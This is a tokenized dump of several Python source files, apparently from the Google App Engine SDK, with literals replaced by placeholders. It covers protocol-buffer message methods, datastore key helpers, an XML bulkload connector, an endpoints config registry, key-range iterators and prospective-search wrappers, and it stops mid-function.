( self ) : <EOL> if self . has_canonical_name_ : <EOL> self . has_canonical_name_ = <NUM_LIT:0> <EOL> self . canonical_name_ = "<STR_LIT>" <EOL> def has_canonical_name ( self ) : return self . has_canonical_name_ <EOL> def aliases_size ( self ) : return len ( self . aliases_ ) <EOL> def aliases_list ( self ) : return self . aliases_ <EOL> def aliases ( self , i ) : <EOL> return self . aliases_ [ i ] <EOL> def set_aliases ( self , i , x ) : <EOL> self . aliases_ [ i ] = x <EOL> def add_aliases ( self , x ) : <EOL> self . aliases_ . append ( x ) <EOL> def clear_aliases ( self ) : <EOL> self . aliases_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . packed_address_size ( ) ) : self . add_packed_address ( x . packed_address ( i ) ) <EOL> if ( x . has_canonical_name ( ) ) : self . set_canonical_name ( x . canonical_name ( ) ) <EOL> for i in xrange ( x . aliases_size ( ) ) : self . add_aliases ( x . aliases ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . packed_address_ ) != len ( x . packed_address_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . packed_address_ , x . packed_address_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_canonical_name_ != x . has_canonical_name_ : return <NUM_LIT:0> <EOL> if self . has_canonical_name_ and self . canonical_name_ != x . canonical_name_ : return <NUM_LIT:0> <EOL> if len ( self . aliases_ ) != len ( x . aliases_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . aliases_ , x . aliases_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . packed_address_ ) <EOL> for i in xrange ( len ( self . packed_address_ ) ) : n += self . lengthString ( len ( self . packed_address_ [ i ] ) ) <EOL> if ( self . has_canonical_name_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . canonical_name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . aliases_ ) <EOL> for i in xrange ( len ( self . aliases_ ) ) : n += self . lengthString ( len ( self . aliases_ [ i ] ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . packed_address_ ) <EOL> for i in xrange ( len ( self . packed_address_ ) ) : n += self . lengthString ( len ( self . packed_address_ [ i ] ) ) <EOL> if ( self . has_canonical_name_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . canonical_name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . aliases_ ) <EOL> for i in xrange ( len ( self . aliases_ ) ) : n += self . lengthString ( len ( self . aliases_ [ i ] ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_packed_address ( ) <EOL> self . clear_canonical_name ( ) <EOL> self . clear_aliases ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . packed_address_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . packed_address_ [ i ] ) <EOL> if ( self . has_canonical_name_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . canonical_name_ ) <EOL> for i in xrange ( len ( self . aliases_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . aliases_ [ i ] ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . packed_address_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . packed_address_ [ i ] ) <EOL> if ( self . has_canonical_name_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . canonical_name_ ) <EOL> for i in xrange ( len ( self . aliases_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . aliases_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> self . add_packed_address ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_canonical_name ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . add_aliases ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . packed_address_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatString ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_canonical_name_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . canonical_name_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . aliases_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatString ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kpacked_address = <NUM_LIT:2> <EOL> kcanonical_name = <NUM_LIT:3> <EOL> kaliases = <NUM_LIT:4> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> } , <NUM_LIT:4> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:4> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> if _extension_runtime : <EOL> pass <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> def EntityKind ( key ) : <EOL> """<STR_LIT>""" <EOL> if key . path ( ) . element_list ( ) : <EOL> return key . path ( ) . element_list ( ) [ - <NUM_LIT:1> ] . type ( ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def EntityGroupKind ( key ) : <EOL> """<STR_LIT>""" <EOL> return key . path ( ) . element ( <NUM_LIT:0> ) . type ( ) <EOL> def EntityListKind ( keylist ) : <EOL> """<STR_LIT>""" <EOL> kinds = map ( EntityKind , keylist ) <EOL> unique_kinds = set ( kinds ) <EOL> numkinds = len ( unique_kinds ) <EOL> if numkinds > <NUM_LIT:1> : <EOL> return '<STR_LIT>' <EOL> elif numkinds == <NUM_LIT:1> : <EOL> return unique_kinds . pop ( ) <EOL> else : <EOL> return '<STR_LIT:None>' <EOL> def EntityGroupName ( entity ) : <EOL> """<STR_LIT>""" <EOL> element = entity . path ( ) . element ( <NUM_LIT:0> ) <EOL> if element . has_id ( ) : <EOL> return str ( element . id ( ) ) <EOL> elif element . has_name ( ) : <EOL> return element . name ( ) <EOL> else : <EOL> return '<STR_LIT:None>' <EOL> def EntityFullName ( entity ) : <EOL> """<STR_LIT>""" <EOL> names = [ ] <EOL> for element in entity . path ( ) . element_list ( ) : <EOL> if element . has_id ( ) : <EOL> name = '<STR_LIT>' % ( element . type ( ) , str ( element . id ( ) ) ) <EOL> elif element . has_name ( ) : <EOL> name = '<STR_LIT>' % ( element . type ( ) , str ( element . name ( ) ) ) <EOL> else : <EOL> name = '<STR_LIT>' % ( element . type ( ) ) <EOL> names . append ( name ) <EOL> fullname = '<STR_LIT:.>' . join ( names ) <EOL> return fullname </s>
<s> """<STR_LIT>""" <EOL> import codecs <EOL> import logging <EOL> import re <EOL> from xml . etree import cElementTree as ElementTree <EOL> from xml . sax import saxutils <EOL> from google . appengine . ext . bulkload import bulkloader_errors <EOL> from google . appengine . ext . bulkload import connector_interface <EOL> NODE_PATH_ONLY_RE = '<STR_LIT>' <EOL> class SimpleXmlConnector ( connector_interface . ConnectorInterface ) : <EOL> """<STR_LIT>""" <EOL> ELEMENT_CENTRIC = <NUM_LIT:1> <EOL> ATTRIBUTE_CENTRIC = <NUM_LIT:2> <EOL> @ classmethod <EOL> def create_from_options ( cls , options , name ) : <EOL> """<STR_LIT>""" <EOL> xpath_to_nodes = options . get ( '<STR_LIT>' ) <EOL> if not xpath_to_nodes : <EOL> raise bulkloader_errors . InvalidConfiguration ( <EOL> '<STR_LIT>' % <EOL> name ) <EOL> if not re . match ( NODE_PATH_ONLY_RE , xpath_to_nodes ) : <EOL> logging . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> xml_style = options . get ( '<STR_LIT>' ) <EOL> xml_style_mapping = { <EOL> '<STR_LIT>' : cls . ELEMENT_CENTRIC , <EOL> '<STR_LIT>' : cls . ATTRIBUTE_CENTRIC , <EOL> } <EOL> if xml_style not in xml_style_mapping : <EOL> raise bulkloader_errors . InvalidConfiguration ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( '<STR_LIT>' . join ( xml_style_mapping . keys ( ) ) , xml_style , <EOL> name ) ) <EOL> return cls ( xpath_to_nodes , xml_style_mapping [ xml_style ] ) <EOL> def __init__ ( self , xpath_to_nodes , xml_style ) : <EOL> """<STR_LIT>""" <EOL> self . xpath_to_nodes = xpath_to_nodes <EOL> assert xml_style in ( self . ELEMENT_CENTRIC , self . ATTRIBUTE_CENTRIC ) <EOL> self . xml_style = xml_style <EOL> self . output_stream = None <EOL> self . bulkload_state = None <EOL> self . depth = <NUM_LIT:0> <EOL> if re . match ( NODE_PATH_ONLY_RE , xpath_to_nodes ) : <EOL> self . node_list = self . xpath_to_nodes . split ( '<STR_LIT:/>' ) [ <NUM_LIT:1> : ] <EOL> self . entity_node = self . node_list [ - <NUM_LIT:1> ] <EOL> self . node_list = self . node_list [ : - <NUM_LIT:1> ] <EOL> else : <EOL> self . node_list = None <EOL> self . entity_node = None <EOL> self . node_list = None <EOL> def generate_import_record ( self , filename , bulkload_state ) : <EOL> """<STR_LIT>""" <EOL> self . bulkload_state = bulkload_state <EOL> tree = ElementTree . parse ( filename ) <EOL> xpath_to_nodes = self . xpath_to_nodes <EOL> if ( len ( xpath_to_nodes ) > <NUM_LIT:1> and xpath_to_nodes [ <NUM_LIT:0> ] == '<STR_LIT:/>' <EOL> and xpath_to_nodes [ <NUM_LIT:1> ] != '<STR_LIT:/>' ) : <EOL> if not tree . getroot ( ) . tag == xpath_to_nodes . split ( '<STR_LIT:/>' ) [ <NUM_LIT:1> ] : <EOL> return <EOL> xpath_to_nodes = '<STR_LIT:/>' + xpath_to_nodes . split ( '<STR_LIT:/>' , <NUM_LIT:2> ) [ <NUM_LIT:2> ] <EOL> nodes = tree . findall ( xpath_to_nodes ) <EOL> for node in nodes : <EOL> if self . xml_style == self . ELEMENT_CENTRIC : <EOL> input_dict = { } <EOL> for child in node . getchildren ( ) : <EOL> if not child . tag in input_dict : <EOL> input_dict [ child . tag ] = child . text <EOL> else : <EOL> input_dict = dict ( node . items ( ) ) <EOL> input_dict [ '<STR_LIT>' ] = node <EOL> yield input_dict <EOL> def initialize_export ( self , filename , bulkload_state ) : <EOL> """<STR_LIT>""" <EOL> self . bulkload_state = bulkload_state <EOL> if not self . node_list : <EOL> raise bulkloader_errors . InvalidConfiguration ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . output_stream = codecs . open ( filename , '<STR_LIT:wb>' , '<STR_LIT:utf-8>' ) <EOL> self . output_stream . write ( '<STR_LIT>' ) <EOL> self . depth = <NUM_LIT:0> <EOL> for node in self . node_list : <EOL> self . output_stream . write ( '<STR_LIT>' % ( '<STR_LIT:U+0020>' * self . depth , node ) ) <EOL> self . depth += <NUM_LIT:1> <EOL> self . indent = '<STR_LIT:U+0020>' * self . depth <EOL> def write_iterable_as_elements ( self , values ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( values , dict ) : <EOL> values = values . iteritems ( ) <EOL> for ( name , value ) in values : <EOL> if isinstance ( value , basestring ) : <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , name , <EOL> saxutils . escape ( value ) , <EOL> name ) ) <EOL> else : <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , name ) ) <EOL> self . depth += <NUM_LIT:1> <EOL> self . indent = '<STR_LIT:U+0020>' * self . depth <EOL> self . write_iterable_as_elements ( value ) <EOL> self . depth -= <NUM_LIT:1> <EOL> self . indent = '<STR_LIT:U+0020>' * self . depth <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , name ) ) <EOL> def write_dict ( self , dictionary ) : <EOL> """<STR_LIT>""" <EOL> if self . xml_style == self . ELEMENT_CENTRIC : <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , self . entity_node ) ) <EOL> self . write_iterable_as_elements ( dictionary ) <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , self . entity_node ) ) <EOL> else : <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , self . entity_node ) ) <EOL> for ( name , value ) in dictionary . iteritems ( ) : <EOL> self . output_stream . write ( '<STR_LIT>' % ( name , saxutils . quoteattr ( value ) ) ) <EOL> self . output_stream . write ( '<STR_LIT>' ) <EOL> def finalize_export ( self ) : <EOL> if not self . output_stream : <EOL> return <EOL> for node in reversed ( self . node_list ) : <EOL> self . depth -= <NUM_LIT:1> <EOL> self . output_stream . write ( '<STR_LIT>' % ( '<STR_LIT:U+0020>' * self . depth , node ) ) <EOL> self . output_stream . close ( ) <EOL> self . output_stream = None </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> import logging <EOL> from protorpc import message_types <EOL> from google . appengine . ext . endpoints import api_backend <EOL> from google . appengine . ext . endpoints import api_config <EOL> from google . appengine . ext . endpoints import api_exceptions <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> class ApiConfigRegistry ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . __registered_classes = set ( ) <EOL> self . __api_configs = set ( ) <EOL> self . __api_methods = { } <EOL> def register_spi ( self , config_contents ) : <EOL> """<STR_LIT>""" <EOL> if config_contents is None : <EOL> return <EOL> parsed_config = json . loads ( config_contents ) <EOL> if not self . __register_class ( parsed_config ) : <EOL> return <EOL> self . __api_configs . add ( config_contents ) <EOL> self . __register_methods ( parsed_config ) <EOL> def __register_class ( self , parsed_config ) : <EOL> """<STR_LIT>""" <EOL> methods = parsed_config . get ( '<STR_LIT>' ) <EOL> if not methods : <EOL> return True <EOL> service_class = None <EOL> for method in methods . itervalues ( ) : <EOL> rosy_method = method . get ( '<STR_LIT>' ) <EOL> if rosy_method and '<STR_LIT:.>' in rosy_method : <EOL> method_class = rosy_method . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if service_class is None : <EOL> service_class = method_class <EOL> elif service_class != method_class : <EOL> raise api_config . ApiConfigurationError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( service_class , <EOL> method_class ) ) <EOL> if service_class is not None : <EOL> if service_class in self . __registered_classes : <EOL> return False <EOL> self . __registered_classes . add ( service_class ) <EOL> return True <EOL> def __register_methods ( self , parsed_config ) : <EOL> """<STR_LIT>""" <EOL> methods = parsed_config . get ( '<STR_LIT>' ) <EOL> if not methods : <EOL> return <EOL> for method_name , method in methods . iteritems ( ) : <EOL> self . __api_methods [ method_name ] = method . get ( '<STR_LIT>' ) <EOL> def lookup_api_method ( self , api_method_name ) : <EOL> """<STR_LIT>""" <EOL> return self . __api_methods . get ( api_method_name ) <EOL> def all_api_configs ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . __api_configs ) <EOL> class BackendServiceImpl ( api_backend . BackendService ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , api_config_registry , app_revision ) : <EOL> """<STR_LIT>""" <EOL> self . __api_config_registry = api_config_registry <EOL> self . __app_revision = app_revision <EOL> @ staticmethod <EOL> def definition_name ( ) : <EOL> """<STR_LIT>""" <EOL> return api_backend . BackendService . definition_name ( ) <EOL> def getApiConfigs ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if request . appRevision and request . appRevision != self . __app_revision : <EOL> raise api_exceptions . BadRequestException ( <EOL> message = '<STR_LIT>' % ( <EOL> self . __app_revision , request . appRevision ) ) <EOL> configs = self . __api_config_registry . all_api_configs ( ) <EOL> return api_backend . ApiConfigList ( items = configs ) <EOL> def logMessages ( self , request ) : <EOL> """<STR_LIT>""" <EOL> Level = api_backend . LogMessagesRequest . LogMessage . Level <EOL> log = logging . getLogger ( __name__ ) <EOL> for message in request . messages : <EOL> level = message . level if message . level is not None else Level . info <EOL> record = logging . LogRecord ( name = __name__ , level = level . number , pathname = '<STR_LIT>' , <EOL> lineno = '<STR_LIT>' , msg = message . message , args = None , <EOL> exc_info = None ) <EOL> log . handle ( record ) <EOL> return message_types . VoidMessage ( ) </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . ext import key_range <EOL> from google . appengine . ext . mapreduce import namespace_range <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> class KeyRangesFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def create_from_list ( cls , list_of_key_ranges ) : <EOL> """<STR_LIT>""" <EOL> return _KeyRangesFromList ( list_of_key_ranges ) <EOL> @ classmethod <EOL> def create_from_ns_range ( cls , ns_range ) : <EOL> """<STR_LIT>""" <EOL> return _KeyRangesFromNSRange ( ns_range ) <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> if json [ "<STR_LIT:name>" ] in _KEYRANGES_CLASSES : <EOL> return _KEYRANGES_CLASSES [ json [ "<STR_LIT:name>" ] ] . from_json ( json ) <EOL> raise ValueError ( "<STR_LIT>" , json ) <EOL> class KeyRanges ( object ) : <EOL> """<STR_LIT>""" <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def to_json ( self ) : <EOL> return { "<STR_LIT:name>" : self . __class__ . __name__ } <EOL> @ classmethod <EOL> def from_json ( cls ) : <EOL> raise NotImplementedError ( ) <EOL> def __eq__ ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def __str__ ( self ) : <EOL> raise NotImplementedError ( ) <EOL> class _KeyRangesFromList ( KeyRanges ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , list_of_key_ranges ) : <EOL> self . _key_ranges = list_of_key_ranges <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> return False <EOL> return self . _key_ranges == other . _key_ranges <EOL> def next ( self ) : <EOL> if self . _key_ranges : <EOL> return self . _key_ranges . pop ( ) <EOL> raise StopIteration ( ) <EOL> def __str__ ( self ) : <EOL> if len ( self . _key_ranges ) == <NUM_LIT:1> : <EOL> return "<STR_LIT>" % ( self . _key_ranges [ <NUM_LIT:0> ] ) <EOL> if self . _key_ranges : <EOL> return "<STR_LIT>" % ( self . _key_ranges [ <NUM_LIT:0> ] , self . _key_ranges [ - <NUM_LIT:1> ] ) <EOL> return "<STR_LIT>" <EOL> def to_json ( self ) : <EOL> json = super ( _KeyRangesFromList , self ) . to_json ( ) <EOL> json . update ( <EOL> { "<STR_LIT>" : [ kr . to_json ( ) for kr in self . _key_ranges ] } ) <EOL> return json <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> return cls ( <EOL> [ key_range . KeyRange . from_json ( kr ) for kr in json [ "<STR_LIT>" ] ] ) <EOL> class _KeyRangesFromNSRange ( KeyRanges ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ns_range ) : <EOL> """<STR_LIT>""" <EOL> self . _ns_range = ns_range <EOL> if self . _ns_range is not None : <EOL> self . _iter = iter ( self . _ns_range ) <EOL> self . _last_ns = None <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> return False <EOL> return self . _ns_range == other . _ns_range <EOL> def __str__ ( self ) : <EOL> return str ( self . _ns_range ) <EOL> def next ( self ) : <EOL> if self . _ns_range is None : <EOL> raise StopIteration ( ) <EOL> self . _last_ns = self . _iter . next ( ) <EOL> if self . _last_ns == self . _ns_range . namespace_end : <EOL> self . _ns_range = None <EOL> return key_range . KeyRange ( namespace = self . _last_ns , <EOL> _app = self . _ns_range . app ) <EOL> def to_json ( self ) : <EOL> json = super ( _KeyRangesFromNSRange , self ) . to_json ( ) <EOL> ns_range = self . _ns_range <EOL> if self . _ns_range is not None and self . _last_ns : <EOL> ns_range = ns_range . with_start_after ( self . _last_ns ) <EOL> if ns_range is not None : <EOL> json . update ( { "<STR_LIT>" : ns_range . to_json_object ( ) } ) <EOL> return json <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> if "<STR_LIT>" in json : <EOL> return cls ( <EOL> namespace_range . NamespaceRange . from_json_object ( json [ "<STR_LIT>" ] ) ) <EOL> else : <EOL> return cls ( None ) <EOL> _KEYRANGES_CLASSES = { <EOL> _KeyRangesFromList . __name__ : _KeyRangesFromList , <EOL> _KeyRangesFromNSRange . __name__ : _KeyRangesFromNSRange <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> from . google_imports import datastore <EOL> from . google_imports import datastore_types <EOL> from . google_imports import prospective_search <EOL> from . google_imports import prospective_search_pb <EOL> from . google_imports import entity_pb <EOL> from . import model <EOL> from . import tasklets <EOL> DEFAULT_RESULT_BATCH_SIZE = prospective_search . DEFAULT_RESULT_BATCH_SIZE <EOL> DEFAULT_LEASE_DURATION_SEC = prospective_search . DEFAULT_LEASE_DURATION_SEC <EOL> DEFAULT_LIST_SUBSCRIPTIONS_MAX_RESULTS = prospective_search . DEFAULT_LIST_SUBSCRIPTIONS_MAX_RESULTS <EOL> DEFAULT_LIST_TOPICS_MAX_RESULTS = prospective_search . DEFAULT_LIST_TOPICS_MAX_RESULTS <EOL> Error = prospective_search . Error <EOL> DocumentTypeError = prospective_search . DocumentTypeError <EOL> QuerySyntaxError = prospective_search . QuerySyntaxError <EOL> SchemaError = prospective_search . SchemaError <EOL> SubscriptionDoesNotExist = prospective_search . SubscriptionDoesNotExist <EOL> TopicNotSpecified = prospective_search . TopicNotSpecified <EOL> SubscriptionState = prospective_search . SubscriptionState <EOL> subscription_state_name = prospective_search . subscription_state_name <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> _doc_class = prospective_search_pb . MatchRequest <EOL> _MODEL_TYPE_TO_PYTHON_TYPE = { <EOL> model . StringProperty : str , <EOL> model . IntegerProperty : int , <EOL> model . BooleanProperty : bool , <EOL> model . FloatProperty : float , <EOL> model . TextProperty : str , <EOL> } <EOL> def _add_schema_entry ( prop_class , name , schema ) : <EOL> """<STR_LIT>""" <EOL> python_type = _MODEL_TYPE_TO_PYTHON_TYPE . get ( prop_class , None ) <EOL> if not python_type : <EOL> return <EOL> if python_type not in schema : <EOL> schema [ python_type ] = [ name ] <EOL> else : <EOL> schema [ python_type ] . append ( name ) <EOL> def _model_to_entity_schema ( document_class ) : <EOL> """<STR_LIT>""" <EOL> schema = { } <EOL> for name , prop in document_class . _properties . iteritems ( ) : <EOL> _add_schema_entry ( prop . __class__ , name , schema ) <EOL> return schema <EOL> def _get_document_topic ( document_class , topic ) : <EOL> assert issubclass ( document_class , model . Model ) <EOL> if topic : <EOL> return topic <EOL> return document_class . _get_kind ( ) <EOL> def subscribe ( document_class , <EOL> query , <EOL> sub_id , <EOL> schema = None , <EOL> topic = None , <EOL> lease_duration_sec = DEFAULT_LEASE_DURATION_SEC ) : <EOL> """<STR_LIT>""" <EOL> assert schema is None <EOL> topic = _get_document_topic ( document_class , topic ) <EOL> schema = _model_to_entity_schema ( document_class ) <EOL> return prospective_search . subscribe ( <EOL> datastore . Entity , <EOL> query , <EOL> sub_id , <EOL> schema = schema , <EOL> topic = topic , <EOL> lease_duration_sec = lease_duration_sec ) <EOL> def unsubscribe ( document_class , sub_id , topic = None ) : <EOL> topic = _get_document_topic ( document_class , topic ) <EOL> prospective_search . unsubscribe ( datastore . Entity , sub_id , topic = topic ) <EOL> def get_subscription ( document_class , sub_id , topic = None ) : <EOL> """<STR_LIT>""" <EOL> topic = _get_document_topic ( document_class , topic ) <EOL> return prospective_search . get_subscription ( datastore . Entity , sub_id , <EOL> topic = topic ) <EOL> def list_subscriptions ( document_class , <EOL> sub_id_start = '<STR_LIT>' , <EOL> topic = None , <EOL> max_results = DEFAULT_LIST_SUBSCRIPTIONS_MAX_RESULTS , <EOL> expires_before = None ) : <EOL> """<STR_LIT>""" <EOL> topic = _get_document_topic ( document_class , topic ) <EOL> return prospective_search . list_subscriptions ( <EOL> datastore . Entity , <EOL> sub_id_start = sub_id_start , <EOL> topic = topic , <EOL> max_results = max_results , <EOL> expires_before = expires_before ) <EOL> list_topics = prospective_search . list_topics <EOL> def match ( document , <EOL> topic = None , <EOL> result_key = None , <EOL> result_relative_url = '<STR_LIT>' , <EOL> result_task_queue = '<STR_LIT:default>' , <EOL> result_batch_size = DEFAULT_RESULT_BATCH_SIZE , <EOL> result_return_document = True ) : <EOL> """<STR_LIT>""" <EOL> topic = _get_document_topic ( document . __class__ , topic ) <EOL> pb = document . _to_pb ( ) <EOL> entity = datastore . Entity ( '<STR_LIT>' ) . FromPb ( pb ) <EOL> return prospective_search . match ( <EOL> entity , <EOL> topic = topic , <EOL> result_key = result_key , <EOL> result_relative_url = result_relative_url , <EOL> result_task_queue = result_task_queue , <EOL> result_batch_size = result_batch_size , <EOL> result_return_document = result_return_document ) <EOL> def get_document ( request ) : <EOL> """<STR_LIT>""" <EOL> doc_class = request . get ( '<STR_LIT>' ) <EOL> if not doc_class : <EOL> return None <EOL> entity = entity_pb . EntityProto ( ) <EOL> entity . ParseFromString ( base64 . urlsafe_b64decode ( <EOL> request . get ( '<STR_LIT>' ) . encode ( '<STR_LIT:utf-8>' ) ) ) <EOL> doc_class = int ( doc_class ) <EOL> ctx = tasklets . get_context ( ) <EOL> adapter = ctx . _conn . adapter <EOL> return adapter . pb_to_entity ( entity ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import sys <EOL> import thread <EOL> import threading <EOL> import traceback <EOL> from google . appengine . api . logservice import logservice <EOL> from google . appengine . runtime import request_environment <EOL> BACKGROUND_REQUEST_ID = '<STR_LIT>' <EOL> class _BackgroundRequest ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _ready_condition = threading . Condition ( ) <EOL> self . _callable_ready = False <EOL> self . _thread_id_ready = False <EOL> def ProvideCallable ( self , target , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> with self . _ready_condition : <EOL> self . _target = target <EOL> self . _args = args <EOL> self . _kwargs = kwargs <EOL> self . _callable_ready = True <EOL> self . _ready_condition . notify ( ) <EOL> while not self . _thread_id_ready : <EOL> self . _ready_condition . wait ( ) <EOL> return self . _thread_id <EOL> def WaitForCallable ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . _ready_condition : <EOL> self . _thread_id = thread . get_ident ( ) <EOL> self . _thread_id_ready = True <EOL> self . _ready_condition . notify ( ) <EOL> while not self . _callable_ready : <EOL> self 